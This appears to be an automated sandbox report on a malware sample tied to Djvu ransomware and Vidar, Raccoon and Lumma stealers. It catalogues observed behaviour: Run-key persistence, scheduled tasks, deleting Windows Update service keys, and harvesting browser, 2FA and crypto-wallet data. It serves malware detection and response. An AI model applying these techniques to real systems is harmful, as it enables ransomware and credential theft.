Analysis Overview
SHA256
a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae
Threat Level: Known bad
The file a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Djvu Ransomware
Raccoon
Modifies security service
Lumma Stealer
Amadey
Detected Djvu ransomware
SmokeLoader
Stops running service(s)
Downloads MZ/PE file
Blocklisted process makes network request
Modifies file permissions
VMProtect packed file
Reads user/profile data of web browsers
Loads dropped DLL
Reads user/profile data of local email clients
Executes dropped EXE
Deletes itself
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Looks up external IP address via web service
Adds Run key to start application
Accesses 2FA software files, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Program crash
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Suspicious behavior: LoadsDriver
Checks processor information in registry
Delays execution with timeout.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-04-25 12:52
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-04-25 12:52
Reported
2023-04-25 12:54
Platform
win10-20230220-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Amadey
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Lumma Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
Raccoon
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
Vidar
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1E46.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1E46.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a21aa4a2-2388-4a0c-8d42-caa3b3f83d0e\\42FA.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\42FA.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Notepad\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\XandETC.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Notepad\Chrome\updater.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4173.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7420.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\27DE.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4173.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\4173.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7420.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\27DE.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\27DE.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7420.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1E46.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1E46.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\27DE.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4173.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7420.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\79BE.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oldplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe
"C:\Users\Admin\AppData\Local\Temp\a5cee34b685cb961b11dadbbf0047f87d344d17454d88c677cf32fdbc007d2ae.exe"
C:\Users\Admin\AppData\Local\Temp\1E46.exe
C:\Users\Admin\AppData\Local\Temp\1E46.exe
C:\Users\Admin\AppData\Local\Temp\1FAE.exe
C:\Users\Admin\AppData\Local\Temp\1FAE.exe
C:\Users\Admin\AppData\Local\Temp\209A.exe
C:\Users\Admin\AppData\Local\Temp\209A.exe
